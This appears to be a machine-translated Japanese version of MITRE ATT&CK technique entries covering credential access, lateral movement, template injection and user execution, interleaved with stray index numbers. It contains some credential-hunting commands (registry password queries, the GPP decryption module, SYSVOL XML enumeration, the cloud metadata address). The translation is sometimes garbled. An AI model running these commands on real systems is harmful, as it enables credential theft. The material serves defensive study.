T1124 システムタイムディスカバリー 敵対者は、ローカルまたはリモートのシステムから、システム時刻やタイムゾーンを収集することができる。システム時刻は、企業ネットワーク内のシステムおよびサービス間の時刻同期を維持するために、ドメイン内のWindows Time Serviceによって設定および保存される。(引用: MSDN System Time) (引用: Technet Windows Time Service)

システム時刻の情報は、Windowsの[Net](https://attack.mitre.org/software/S0039)で<code>net time \hostname</code>を実行してリモートシステムのシステム時刻を収集するなど、さまざまな方法で収集することができます。また、被害者のタイムゾーンは、現在のシステム時刻から推測したり、<code>w32tm /tz</code>を使って収集することもできます。(引用: Technet Windows Time Service)

この情報は、[Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)でファイルを実行したり(引用: RSA EU12 They're Inside)、タイムゾーンに基づいて位置情報を発見して被害者の標的化を支援したり(例: [System Location Discovery](https://attack.mitre.org/techniques/T1614))するなど、他の技術を実行するのに役立つ可能性があります。また、システム時刻の情報を時限爆弾の一部として使用したり、指定した日時まで実行を遅らせたりすることもできます。(引用:AnyRun TimeBomb)
506
T1080 共有コンテンツを汚す
敵対者は、ネットワークドライブや内部コードリポジトリなどの共有ストレージにコンテンツを追加することで、リモートシステムにペイロードを配信することがあります。ネットワークドライブやその他の共有場所に保存されたコンテンツは、本来は有効なファイルに悪意のあるプログラムやスクリプト、エクスプロイトコードを追加することで汚染されている可能性があります。ユーザーが汚染された共有コンテンツを開くと、悪意のある部分が実行され、リモートシステム上で敵対者のコードが実行されます。敵対者は、汚染された共有コンテンツを利用して、横方向に移動することがあります。

ディレクトリ共有ピボットは、この手法のバリエーションで、ユーザーがネットワーク上の共有ディレクトリにアクセスする際に、他のいくつかの手法を用いてマルウェアを伝播させます。これは、[Masquerading](https://attack.mitre.org/techniques/T1036)を使用して、[Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001)によって隠されている実際のディレクトリのように見えるディレクトリ.LNKファイルの[Shortcut Modification](https://attack.mitre.org/techniques/T1547/009)を使用します。.LNKベースの悪意のあるディレクトリには、ディレクトリ内の隠されたマルウェアファイルを実行するコマンドが埋め込まれており、その後、意図した本物のディレクトリを開くことで、ユーザーが期待する動作が引き続き行われるようになっています。頻繁に使用されるネットワークディレクトリで使用された場合、この手法は頻繁な再感染を引き起こし、システムへの広範なアクセス、そして潜在的には新しい高権限のアカウントへのアクセスを引き起こす可能性があります。(引用:Retwin Directory Share Pivot)

敵対者は、共有ネットワークディレクトリ上の健全なバイナリにマルウェアのコードを追 加または前置することで、バイナリ感染により共有ネットワークディレクトリを侵害することもあります。マルウェアは、健全なバイナリのオリジナル・エントリ・ポイント(OEP)を変更して、正当なコードよりも先に実行されるようにすることがあります。新たに感染したファイルがリモートシステムで実行されると、そのファイルを介して感染が拡大していきます。これらの感染は、.EXE、.DLL、.SCR、.BAT、.VBSなどの拡張子で終わるバイナリ形式と非バイナリ形式の両方を対象としていますが、これらに限定されません。
507
T1221 テンプレート・インジェクション 侵入者は、悪意のあるコードを隠したり、認証を強要したりするために、Officeドキュメントのテンプレートに参照を作成または変更する可能性があります。MicrosoftのOffice Open XML(OOXML)仕様では、従来のバイナリ形式(.doc、.xls、.ppt)に代わる、XMLベースのOffice文書(.docx、xlsx、.pptx)の形式を定義しています。OOXMLファイルは、パーツと呼ばれる様々なXMLファイルで妥協したZIPアーカイブをまとめたもので、ドキュメントのレンダリング方法をまとめて定義するプロパティが含まれています。(引用:Microsoft Open XML July 2017)

パーツ内のプロパティは、オンラインURLでアクセスされる共有パブリックリソースを参照する場合があります。例えば、テンプレートプロパティは、文書が読み込まれる際にフェッチされる、フォーマット済みの文書の青写真として機能するファイルを参照します。

敵対者は、この技術を悪用して、文書を介して実行される悪意のあるコードを最初に隠す可能性があります。文書に注入されたテンプレート参照により、悪意のあるペイロードが文書の読み込み時に取得され、実行される可能性があります。(このような文書は、[Phishing](https://attack.mitre.org/techniques/T1566)や[Taint Shared Content](https://attack.mitre.org/techniques/T1080)などの他の手法で配信され、悪意のあるペイロードが取得されるまで典型的なインジケータ(VBAマクロやスクリプトなど)が存在しないため、静的な検出を回避することができます。(引用:Redxorblue Remote Template Injection) テンプレート・インジェクションを利用して、エクスプロイトを含む悪意のあるコードを読み込ませる例が実際に確認されています。(引用:MalwareBytes Template Injection OCT 2017)

この技術は、SMB/HTTPS(または他のクレデンシャルプロンプト)URLを注入し、認証の試みをトリガーすることで、[強制認証](https://attack.mitre.org/techniques/T1187)を可能にすることもあります。(引用:Anomali Template Injection MAR 2018) (引用:Talos Template Injection July 2017) (引用:ryhanson phishery SEPT 2016)
508
T1205 トラフィックシグナリング 敵対者は、トラフィックシグナリングを使用して、ポートの開放や、パーシステンスやコマンド&コントロールに使用されるその他の悪意のある機能を隠すことがあります。トラフィックシグナリングとは、閉じたポートの開放や悪意のあるタスクの実行など、特別な反応を引き起こすために、システムに送信しなければならないマジックバリューやシーケンスを使用することです。トラフィックシグナリングは、ポートを開く前に、敵対者がコマンド&コントロールに利用できるような、特定の特性を持つ一連のパケットを送信するという形で行われます。通常、この一連のパケットは、事前に定義された一連のクローズドポートへの接続試行([Port Knocking](https://attack.mitre.org/techniques/T1205/001)など)で構成されますが、通常とは異なるフラグや特定の文字列、その他の固有の特性を含むこともあります。

敵対者は、すでに開いているポートと通信することもできますが、そのポートをリッスンしているサービスは、適切なマジックバリューが渡された場合にのみ、コマンドに応答したり、その他の悪意のある機能を起動したりします。

通信を起動するための信号パケットの観測は、さまざまな方法で行うことができます。1つは、Cd00r(引用者:Hartrell cd00r 2002)が最初に実装した方法で、libpcapライブラリを使用して問題のパケットをスニッフィングすることです。

ネットワーク機器では、攻撃者は細工したパケットを使用して、Telnetなどの機器が提供する標準サービスの[Network Device Authentication](https://attack.mitre.org/techniques/T1556/004)を有効にすることがあります。 また、このようなシグナリングは、telnetなどの閉じたサービスポートを開いたり、デバイスに埋め込まれたマルウェアのモジュール修正を引き起こし、悪意のある機能を追加、削除、変更するために使用されることもあります。(引用:Cisco Synful Knock Evolution) (引用:FireEye - Synful Knock) (引用:Cisco Blog Legacy Device Attacks) 組み込み機器でこのようなトラフィック・シグナリングを可能にするためには、アーキテクチャーがモノリシックであることから、敵対者はまず[Patch System Image](https://attack.mitre.org/techniques/T1601/001)を実現し、活用する必要があります。

また、敵対者はWake-on-LAN機能を利用して、電源の切れたシステムをオンにすることがあります。Wake-on-LANとは、電源の切れたシステムにマジックパケットを送信することで、そのシステムの電源を入れたり、起こしたりすることができるハードウェア機能です。一度電源を入れたシステムは、横移動のターゲットになる可能性がある。(引用:Bleeping Computer - Ryuk WoL) (引用:AMD Magic Packet)
509
T1205.001 トラフィックシグナリングポートノッキング 敵対者は、ポートノッキングを利用して、パーシステンスやコマンド&コントロールに使用するオープンポートを隠すことがあります。ポートを有効にするには、敵対者は、あらかじめ定義された一連の閉じたポートに対して一連の接続試行を行います。

この手法は、リスニングポートを動的に開く場合と、異なるシステム上のリスニングサーバへの接続を開始する場合の両方が観察されています。

通信のトリガーとなる信号パケットの観測は、さまざまな方法で行うことができます。一つは、Cd00r(引用者:Hartrell cd00r 2002)が最初に実装した方法で、libpcapライブラリを使用して問題のパケットをスニッフィングすることです。もう1つの方法は、raw socketsを活用するもので、マルウェアは、他のプログラムが使用するために既に開いているポートを使用することができます。
510
T1537 クラウドアカウントへのデータ転送

クラウド環境外への通常のファイル転送やコマンド&コントロールチャネルを介した大規模な転送を監視している防御者は、同じクラウドプロバイダ内の別のアカウントへのデータ転送を監視していない可能性があります。このような転送は、既存のクラウドプロバイダーのAPIやクラウドプロバイダーの内部アドレス空間を利用して、通常のトラフィックに紛れ込ませたり、外部のネットワークインターフェース上でのデータ転送を回避したりすることがあります。

敵対者がクラウドインスタンスのバックアップを作成し、別のアカウントに転送するインシデントが確認されています。(引用:DOJ GRU Indictment Jul 2018)
511
T1127 Trusted Developer Utilities プロキシ実行 敵対者は、信頼できる開発者用ユーティリティを利用して、悪意のあるペイロードの実行を代理することがあります。ソフトウェア開発関連の作業に使用されるユーティリティには、開発、デバッグ、リバースエンジニアリングを支援するために、さまざまな形式でコードを実行するために使用できるものが数多くあります。(引用: engima0x3 DNX Bypass)(引用: engima0x3 RCSI Bypass)(引用: Exploit Monday WinDbg)(引用: LOLBAS Tracker) これらのユーティリティは、システム上での実行を可能にする正当な証明書で署名されていることが多く、アプリケーション制御ソリューションを効果的に回避する信頼されたプロセスを介して悪意のあるコードの実行をプロキシすることができます。 512
T1127.001 Trusted Developer Utilities プロキシの実行。MSBuild 敵対者は、MSBuildを使用して、信頼できるWindowsユーティリティーを介してコードの実行をプロキシする可能性があります。MSBuild.exe(Microsoft Build Engine)は、Visual Studioで使用されるソフトウェアビルドプラットフォームです。

MSBuild.exe(Microsoft Build Engine)は、Visual Studioで使用されるソフトウェアビルドプラットフォームです。MSBuild.exeは、さまざまなプラットフォームや構成をロードおよびビルドするための要件を定義するXML形式のプロジェクトファイルを処理します。.NETバージョン4で導入されたMSBuildのインラインタスク機能により、C#やVisual BasicのコードをXMLプロジェクトファイルに挿入することができます(引用:MSDN MSBuild)(引用:Microsoft MSBuild Inline Tasks 2017)MSBuildはインラインタスクをコンパイルして実行します。MSBuild.exeは署名されたMicrosoftのバイナリであるため、このように使用されると、任意のコードを実行したり、MSBuild.exeの実行を許可するように設定されたアプリケーション制御の防御をバイパスしたりすることができます(引用:LOLBAS Msbuild)
513
T1199 信頼関係 敵対者は、意図した被害者へのアクセス権を持つ組織に侵入したり、それを利用したりすることがあります。

組織は、内部システムやクラウドベースの環境を管理するために、外部の第二または第三のプロバイダーに高度なアクセスを許可することがよくあります。このような関係の例としては、IT サービス契約者、マネージドセキュリティプロバイダ、インフラストラクチャ契約者(HVAC、エレベータ、物理的セキュリティなど)が挙げられます。サードパーティ・プロバイダのアクセスは、保守対象のインフラに限定されることを意図していても、企業の他の部分と同じネットワーク上に存在する場合があります。そのため、内部ネットワーク・システムへのアクセスのために相手が使用している[Valid Accounts](https://attack.mitre.org/techniques/T1078)が漏洩して使用される可能性がある。(引用:CISA IT Service Providers)
514
T1111 2ファクタ認証のインターセプト 敵対者は、スマートカードなどの二要素認証機構を標的にして、システム、サービス、ネットワークリソースへのアクセスに使用できる認証情報にアクセスする可能性があります。二要素認証または多要素認証 (2FA または MFA) の使用が推奨され、ユーザ名とパスワードだけの場合よりも高いレベルのセキュリ ティが提供されますが、組織は、これらのセキュリティ機構を傍受して回避するために使用できる技術に注意する 必要があります。

二要素認証にスマートカードを使用する場合、通常の使用時にスマートカードに関連付けられたパ スワードを取得するには、キーロガーを使用する必要があります。挿入されたカードとスマートカードのパスワードへのアクセスの両方があれば、敵対者は感染したシステムを使ってネットワークリソースに接続し、挿入されたハードウェアトークンによる認証を代理することができます。(引用:Mandiant M Trends 2011)

敵対者は、キーロガーを使用して、RSA SecurID などの他のハードウェア・トークンも同様に狙うことができます。トークンの入力(ユーザの個人識別コードを含む)をキャプチャすると、一時的なアクセス(次の値のロールオーバーまでワンタイムパスコードを再生するなど)が可能になるだけでなく、将来の認証値を確実に予測できるようになる可能性があります(アルゴリズムと、付加された一時的なコードを生成するために使用されるシード値の両方にアクセスできる場合)。(引用:GCN RSA 2011 年 6 月号)

他の 2FA の方法が傍受され、敵対者が認証に使用する可能性があります。ワンタイムコードを帯域外通信(電子メールや SMS)で送信することはよくあります。デバイスやサービスのセキュリティが確保されていなければ、傍受される可能性があります。このような認証メカニズムは、主にサイバー犯罪者が狙うものですが、先進的なアクターにも狙われています。(引用:エメンタール作戦)
515
T1552 無担保のクレデンシャル 敵対者は、侵害されたシステムを検索して、安全に保管されていない認証情報を見つけて取得することがあります。これらの認証情報は、平文ファイル(例:[Bash History](https://attack.mitre.org/techniques/T1552/003))、オペレーティング・システムやアプリケーション固有のリポジトリ(例:[Credentials in Registry](https://attack.mitre.org/techniques/T1552/002))、その他の特殊なファイル/アーティファクト(例:[Private Keys](https://attack.mitre.org/techniques/T1552/004))など、システムのさまざまな場所に保存されたり、誤って配置されたりする可能性があります。 516
T1552.003 保護されていないクレデンシャルバッシュの履歴 侵入者は、危険にさらされたシステム上のbashコマンドの履歴を検索して、安全に保存されていない認証情報を探すことがあります。Bash は、ユーザがコマンドラインで入力したコマンドを "history" ユーティリティで記録します。ユーザーがログアウトすると、履歴はそのユーザーの<code>.bash_history</code>ファイルにフラッシュされます。各ユーザーのこのファイルは、<code>~/.bash_history</code>という同じ場所に存在します。通常、このファイルには、ユーザーの直近の500コマンドが記録されています。ユーザーは、コマンドラインでプログラムのパラメータとしてユーザー名やパスワードを入力することが多く、ログアウト時にこのファイルに保存されます。攻撃者は、このファイルを調べて潜在的な認証情報を探すことで、これを悪用することができます。(引用:External to DA, the OS X Way) 517
T1552.005 保護されていないクレデンシャルクラウドインスタンスのメタデータAPI

ほとんどのクラウドサービスプロバイダは、クラウドインスタンスメタデータAPIをサポートしています。これは、実行中の仮想インスタンスに提供されるサービスで、アプリケーションは実行中の仮想インスタンスに関する情報にアクセスできます。一般的に利用可能な情報には、名前、セキュリティグループ、および認証情報や追加の秘密を含むUserDataスクリプトなどの機密データを含む追加のメタデータが含まれます。Instance Metadata APIは、アプリケーションの管理を支援するための利便性として提供されており、インスタンスにアクセスできる人であれば誰でもアクセスできます。(引用:AWS Instance Metadata API) クラウドメタデータAPIは、少なくとも1つの高プロファイルの侵害に使用されています。(引用:Krebs Capital One August 2019)

敵対者が実行中の仮想インスタンス上に存在する場合、彼らはInstance Metadata APIを直接照会して、追加リソースへのアクセスを許可するクレデンシャルを特定することができます。さらに、攻撃者は、Instance Metadata APIへのリクエストを介して機密情報へのアクセスを可能にする、公衆向けWebプロキシのServer-Side Request Forgery(SSRF)脆弱性を悪用する可能性があります(引用:RedLock Instance Metadata API 2018)

クラウドサービスプロバイダー全体のデファクトスタンダードは、<code>http[:]//169.254.169.254</code>でInstance Metadata APIをホストすることです。
518
T1552.007 保護されていないクレデンシャルコンテナAPI 敵対者は、コンテナ環境内のAPIを介して認証情報を収集することがあります。Docker APIやKubernetes APIなど、これらの環境内のAPIにより、ユーザーはコンテナリソースやクラスタコンポーネントをリモートで管理することができます。(引用:Docker API)(引用:Kubernetes API)

敵対者はDocker APIにアクセスして、環境内のクラウド、コンテナ、その他様々なリソースへの認証情報を含むログを収集する可能性があります。(引用:Unit 42 Unsecured Docker Daemons) ポッドのサービスアカウントを経由するなど、十分な権限を持つ敵対者は、Kubernetes APIを使用してKubernetes APIサーバーから認証情報を取得することもできます。これらの認証情報には、Docker API認証に必要なものや、Kubernetesクラスタコンポーネントからのシークレットが含まれる場合があります。
519
T1552.001 保護されていないクレデンシャルファイル内のクレデンシャル 敵対者は、ローカル・ファイル・システムやリモート・ファイル・シェアを検索して、安全に保存されていないクレデンシャルを含むファイルを探すことがあります。これらは、ユーザーが自分の認証情報を保存するために作成したファイル、個人グループで共有されている認証情報の保存場所、システムやサービスのパスワードを含む設定ファイル、埋め込まれたパスワードを含むソースコード/バイナリファイルである可能性があります。

[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)により、バックアップや保存された仮想マシンからパスワードを抽出することが可能です。(引用:CG 2014) また、Windowsドメインコントローラに保存されているグループポリシー環境設定からもパスワードを取得できる可能性があります。(引用:SRD GPP)

クラウドやコンテナ環境では、認証されたユーザーやサービスアカウントの認証情報は、多くの場合、ローカルの設定ファイルやクレデンシャルファイルに保存されています。(引用:Unit 42 Hildegard Malware) また、コンテナログのデプロイメントコマンドのパラメータとして見つかることもあります。(引用:Unit 42 Unsecured Docker Daemons) 場合によっては、これらのファイルをコピーして別のマシンで再利用したり、ファイルをコピーすることなく、内容を読み取って認証に使用したりすることができます。(引用:Specter Ops - Cloud Credential Storage)
520
T1552.002 保護されていないクレデンシャルレジストリ内のクレデンシャル 敵対者は、危険にさらされたシステムのレジストリを検索して、安全に保存されていない認証情報を探すことがあります。Windows レジストリには、システムや他のプログラムで使用できる設定情報が保存されています。敵対者は、他のプログラムやサービスで使用するために保存されている認証情報やパスワードを求めてレジストリを照会することがあります。

パスワード情報に関連するレジストリキーを検索するコマンド例です。(引用:Pentestlab Stored Credentials)

* Local Machine Hive: <code>reg query HKLM /f password /t REG_SZ /s</code>
* Current User Hive: <code>reg query HKCU /f password /t REG_SZ /s</code>
521
T1552.006 保護されていないクレデンシャルグループポリシー環境設定 敵対者は、セキュリティ保護されていない認証情報をグループ・ポリシー・プリファレンス(GPP)で見つけようとすることがあります。GPPは、管理者が認証情報を埋め込んだドメインポリシーを作成するためのツールです。これらのポリシーにより、管理者はローカルアカウントを設定することができます。(引用:Microsoft GPP 2016)

これらのグループポリシーは、ドメインコントローラのSYSVOLに保存されます。つまり、ドメインユーザーであれば誰でもSYSVOLの共有を閲覧し、(公開されているAESキーを使って)パスワードを復号することができます。(引用:Microsoft GPP Key)

以下のツールとスクリプトを使用して、Group Policy Preference XMLファイルからパスワードファイルを収集し、復号化することができます。

* Metasploitのpost exploitationモジュール:<code>post/windows/gather/credentials/gpp</code>
* Get-GPPPassword(引用:Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py

SYSVOL共有上で、敵対者は次のコマンドを使って潜在的なGPP XMLファイルを列挙することができます: <code>dir /s * .xml</code>
522
T1552.004 保護されていないクレデンシャル。プライベートキー 敵対者は、安全でない形で保存された認証情報を求めて、侵害されたシステムの秘密鍵証明書ファイルを検索することがあります。秘密暗号鍵と証明書は、認証、暗号化/復号化、およびデジタル署名に使用されます。(引用:Wikipedia Public Key Crypto)一般的な鍵と証明書のファイル拡張子は以下の通りです。.key、.pgp、.gpg、.ppk,

敵対者は、一般的な鍵のディレクトリを探すこともあります。たとえば、 * nixベースのシステムではSSH鍵の<code>~/.ssh</code>、Windowsでは<code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>などがあります。これらの秘密鍵は、SSHのような[リモートサービス](https://attack.mitre.org/techniques/T1021)への認証や、電子メールなどの収集した他のファイルの復号に使用することができます。

暗号鍵や証明書に関連するファイル拡張子を、危険なシステムで検索するアドバーサリーツールが発見されています。(引用:Kaspersky Careto)(引用:Palo Alto Prince of Persia)

秘密鍵の中には、操作のためにパスワードやパスフレーズを必要とするものがあるため、敵対者は[Input Capture](https://attack.mitre.org/techniques/T1056)を使用してキーロギングを行ったり、オフラインでパスフレーズの[Brute Force](https://attack.mitre.org/techniques/T1110)を試みることもあります。
523
T1535 未使用/未サポートのクラウド・リージョン 侵入者は、検知を逃れるために、使用されていない地理的なサービス地域にクラウドインスタンスを作成することがあります。

クラウドサービスプロバイダは、パフォーマンスの向上、冗長性の確保、コンプライアンス要件の充足などを目的として、世界各地にインフラを提供しています。多くの場合、顧客は利用可能な地域の一部のみを使用し、他の地域を積極的に監視しないことがあります。

この動作のバリエーションとして、クラウドのリージョン間の機能の違いを利用したものがあります。

敵対者が未使用のAWSリージョンを利用する例としては、[Resource Hijacking](https://attack.mitre.org/techniques/T1496)による暗号通貨のマイニングがありますが、これは使用する処理能力に応じて時間の経過とともにかなりのコストがかかる可能性があります。(引用:CloudSploit - Unused AWS Regions)
524
T1550 別の認証材料を使用する

認証プロセスでは、一般に、有効なID(ユーザ名など)と1つ以上の認証要素(パスワード、ピン、物理的なスマー トカード、トークンジェネレータなど)を必要とする。代替認証材料は、ユーザーまたはアプリケーションが有効なIDと必要な認証要素を提供して認証に成功した後、システムによって合法的に生成されます。代替認証材料は、ID 作成プロセス中に生成されることもある。(引用:NIST Authentication)(引用:NIST MFA)

代替認証材料をキャッシュすることで、システムはユーザーに認証要素の再入力を求めることなく、ID が正常に認証されたことを確認することができる。代替認証はシステムがメモリまたはディスクに保持しなければならないため、[Credential Access](https://attack.mitre.org/tactics/TA0006)技術によって盗まれる危険性があります。代替認証の材料を盗むことで、敵はシステムのアクセス制御を迂回し、平文のパスワードや追加の認証要素を知らずにシステムを認証することができます。
525
T1550.001 代替の認証材料を使用する。アプリケーションアクセストークン 敵対者は、盗まれたアプリケーション・アクセス・トークンを使用して、通常の認証プロセスを回避し、リモート・システム上の制限されたアカウント、情報、またはサービスにアクセスすることができます。これらのトークンは通常、ユーザーから盗まれ、ログイン認証の代わりに使用されます。

アプリケーションアクセストークンは、ユーザーに代わって認可されたAPIリクエストを行うために使用され、クラウドベースのアプリケーションやSaaS(Software-as-a-Service)のリソースにアクセスする方法として一般的に使用されています。(引用元。Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)OAuthは、システムへのアクセスのためにユーザーにトークンを発行する、一般的に実装されているフレームワークの1つです。これらのフレームワークは共同で使用され、ユーザーを検証し、ユーザーが実行を許可されるアクションを決定します。アイデンティティが確立されると、ユーザーの実際の認証情報を渡すことなく、トークンによってアクションが許可されます。そのため、トークンが侵害されると、悪意のあるアプリケーションから他のサイトのリソースへのアクセスが可能になります。(引用:okta)

例えば、クラウドベースの電子メールサービスでは、OAuthアクセストークンが悪意のあるアプリケーションに付与されると、バックグラウンドアクセスを可能にする「リフレッシュ」トークンが付与された場合、ユーザーアカウントの機能に長期間アクセスできる可能性があります。(Citation: Microsoft Identity Platform Access 2019) OAuthアクセストークンを使用すると、敵対者はユーザーに付与されたREST APIを使用して、電子メールの検索や連絡先の列挙などの機能を実行できます。(Citation: Staaldraad Phishing with OAuth 2017)

侵害されたアクセストークンは、他のサービスを侵害するための最初のステップとして使用される可能性があります。例えば、トークンが被害者のプライマリメールへのアクセスを許可した場合、敵対者はパスワード忘れのルーチンをトリガーすることで、ターゲットが購読している他のすべてのサービスへのアクセスを拡張することができるかもしれません。トークンを使用した API への直接アクセスは、第 2 認証要素の効果を無効にし、パスワード変更などの直観的な対策の影響を受けない場合があります。APIチャネルを介したアクセスの不正使用は、サービスプロバイダ側からでさえも検出が困難な場合があります。
526
T1550.002 代替の認証材料を使用する。パス・ザ・ハッシュ 敵対者は、盗んだパスワード・ハッシュを使用して、通常のシステム・アクセス制御を迂回して環境内を横移動する「パス・ザ・ハッシュ」を行う可能性があります。パス・ザ・ハッシュ(PtH)とは、ユーザーの平文パスワードにアクセスすることなく、ユーザーとして認証する方法です。

PtHを実行する際には、[Credential Access](https://attack.mitre.org/tactics/TA0006)技術を使用して、使用するアカウントの有効なパスワード・ハッシュをキャプチャします。取得されたハッシュは、そのユーザーとして認証するためにPtHで使用される。

敵対者は、盗んだパスワードハッシュを使用して「ハッシュを超える」こともできます。これは、PtH と同様に、パスワードハッシュを使用してユーザを認証しますが、パスワードハッシュを使用して有効な Kerberos チケットを作成します。このチケットを使って、[Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)攻撃を行うことができます。(Citation: Stealthbits Overpass-the-Hash)
527
T1550.003 代替の認証材料を使うパス・ザ・チケット 敵対者は、盗んだ Kerberos チケットを使用して、通常のシステムアクセス制御を迂回して環境内を横方向に移動する「パス・ザ・チケット」を行う可能性があります。パスザチケット(PtT)とは、アカウントのパスワードにアクセスすることなく、Kerberosチケットを使用してシステムを認証する方法です。

PtTを実行する際、[Valid Accounts](https://attack.mitre.org/techniques/T1078)の有効なKerberosチケットは、[OS Credential Dumping](https://attack.mitre.org/techniques/T1003)によって捕捉される。アクセスのレベルに応じて、ユーザのサービス・チケットやチケット・グラント・チケット(TGT)が取得されることがある。サービスチケットは、特定のリソースへのアクセスを許可するもので、TGTは、ユーザがアクセスする権限を持つあらゆるリソースにアクセスするために、チケット付与サービス(TGS)にサービスチケットを要求するために使用することができます。(引用:ADSecurity AD Kerberos Attacks)(引用:GentilKiwi Pass the Ticket)

認証メカニズムとしてKerberosを使用するサービスでは、[シルバーチケット](https://attack.mitre.org/techniques/T1558/002)を取得することができ、その特定のリソースおよびリソースをホストするシステム(例:SharePoint)にアクセスするためのチケットを生成するために使用されます。(Citation: ADSecurity AD Kerberos Attacks)

[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) は、Key Distribution Service account KRBTGT account NTLM hash を使用して、ドメインに対して取得することができます。このアカウントは、Active Directory 内の任意のアカウントに対する TGT の生成を可能にします。(Citation: Campbell 2014)

また、敵対者は、盗まれたパスワードハッシュや AES キーなどの他のユーザ情報を使用して、有効な Kerberos チケットを作成することができます。例えば、「ハッシュのオーバーパス」では、NTLMのパスワード・ハッシュを使用してユーザとして認証する(すなわち、[Pass the Hash](https://attack.mitre.org/techniques/T1550/002))一方で、そのパスワード・ハッシュを使用して有効なKerberosチケットを作成することになる。(引用:Stealthbits Overpass-the-Hash)
528
T1550.004 代替の認証材料を使用する。ウェブセッションクッキー 侵入者は、盗まれたセッション・クッキーを使って、ウェブ・アプリケーションやサービスを認証することができます。この技術は、セッションがすでに認証されているため、いくつかの多要素認証プロトコルを回避することができます。(引用:Pass The Cookie)

認証クッキーは、クラウドベースのサービスを含むウェブアプリケーションで一般的に使用されています。クッキーは、ウェブアプリケーションが積極的に使用されていなくても、長期間にわたって有効であることが多いです。Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)や [Web Cookies](https://attack.mitre.org/techniques/T1606/001)でクッキーを取得した後、敵対者は自分が制御するブラウザにクッキーをインポートし、セッション・クッキーが有効である限り、ユーザとしてサイトやアプリケーションを使用することができます。サイトにログインすると、敵対者は機密情報にアクセスしたり、電子メールを読んだり、被害者のアカウントが実行する権限を持っているアクションを実行したりすることができます。

多要素認証システムをバイパスするためにセッションクッキーをターゲットにしたマルウェアの例があります。(引用:Unit 42 Mac Crypto Cookies January 2019)
529
T1204 ユーザー実行 敵対者は、実行を得るためにユーザーの特定の行動に依存することがあります。ユーザーは、悪意のある文書ファイルやリンクを開くなどして悪意のあるコードを実行させるために、ソーシャルエンジニアリングを受けることがあります。

「ユーザーによる実行」(https://attack.mitre.org/techniques/T1204)は、初期アクセスの直後に頻繁に発生しますが、侵入の他の段階でも発生する可能性があります。例えば、敵対者が共有ディレクトリやユーザーのデスクトップにファイルを置き、ユーザーがそれをクリックすることを期待している場合などです。この活動は、[Internal Spearphishing](https://attack.mitre.org/techniques/T1534)の直後にも見られることがあります。
530
T1204.002 ユーザーの実行悪意のあるファイル 敵対者は、ユーザーが悪意のあるファイルを開くことを利用して、コードを実行することがあります。ユーザーは、コードの実行につながるファイルを開くように、ソーシャルエンジニアリングを受けることがあります。このようなユーザーの行動は、通常、[Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)の後に続く行動として観察されます。敵対者は、.doc、.pdf、.xls、.rtf、.scr、.exe、.lnk、.pif、.cplなど、ユーザの実行を要求する複数のタイプのファイルを使用することがあります。

敵対者は、ユーザがファイルを開く可能性を高めるために、ファイルにさまざまな形の[マスカレード](https://attack.mitre.org/techniques/T1036)を採用することがあります。

[悪意のあるファイル](https://attack.mitre.org/techniques/T1204/002)は、初期アクセスの直後に頻繁に発生しますが、侵入の他の段階でも発生する可能性があります。例えば、敵対者が共有ディレクトリやユーザーのデスクトップにファイルを置き、ユーザーがそれをクリックすることを期待している場合などです。この活動は、[Internal Spearphishing](https://attack.mitre.org/techniques/T1534)の直後にも見られることがあります。
531
T1204.003 ユーザーの実行。悪意のある画像 侵入者は、実行を容易にするために、悪意のあるイメージを実行しているユーザーに依存している可能性があります。Amazon Web Services(AWS)のAmazon Machine Images(AMI)、Google Cloud Platform(GCP)のイメージ、Azureのイメージ、およびDockerなどの一般的なコンテナランタイムは、バックドアが可能です。バックドアされたイメージは、[Upload Malware](https://attack.mitre.org/techniques/T1608/001)を介して公開リポジトリにアップロードされ、ユーザーはそのイメージが悪意のあるものであることに気づかずに、そのイメージからインスタンスやコンテナをダウンロードしてデプロイしてしまう可能性があり、イニシャルアクセスを実現する技術を回避することができます。これにより、インスタンスやコンテナ内で、暗号通貨のマイニングを実行するコードなどの悪意のあるコードが実行される可能性があります。(引用:Summit Route Malicious AMI)

また、敵対者は、ユーザーが誤ってイメージからインスタンスやコンテナをデプロイする可能性を高めるために、イメージに特定の名前を付けることがあります(例:[Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005))。
532
T1204.001 ユーザーの実行。悪意のあるリンク 敵対者は、ユーザーが悪意のあるリンクをクリックすることを利用して、コードを実行することがあります。ユーザーは、コードの実行につながるリンクをクリックさせるために、ソーシャルエンジニアリングを受けることがあります。このユーザーの行動は、通常、[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)に続く行動として観察されます。リンクをクリックすると、「Exploitation for Client Execution」(https://attack.mitre.org/techniques/T1203)によるブラウザやアプリケーションの脆弱性の悪用など、他の実行手法につながることもあります。また、リンクをクリックすると、[Malicious File](https://attack.mitre.org/techniques/T1204/002)を通じて、実行を必要とするファイルをダウンロードさせられることもあります。 533
T1078 有効なアカウント 敵対者は、初期アクセス、持続アクセス、特権エスカレーション、防御回避などの手段として、既存のアカウントの認証情報を入手し、悪用することがあります。危殆化した認証情報は、ネットワーク内のシステムのさまざまなリソースに設定されているアクセス制御を回避するために使用されることがあります。また、リモートシステムや、VPN、Outlook Web Access、リモートデスクトップなどの外部から利用可能なサービスへの持続的なアクセスに使用されることもあります。また、危殆化した認証情報は、敵対者に特定のシステムに対する特権の増加や、ネットワークの制限された領域へのアクセスを与える可能性があります。

システムのネットワーク上でローカル、ドメイン、およびクラウドのアカウントの権限が重複していると、敵対者がアカウントやシステムを切り替えて、企業内で設定されたアクセス制御を回避するための高レベルのアクセス(ドメインまたは企業の管理者など)に到達できる可能性があるため、懸念されます。(引用:TechNet Credential Theft)
534
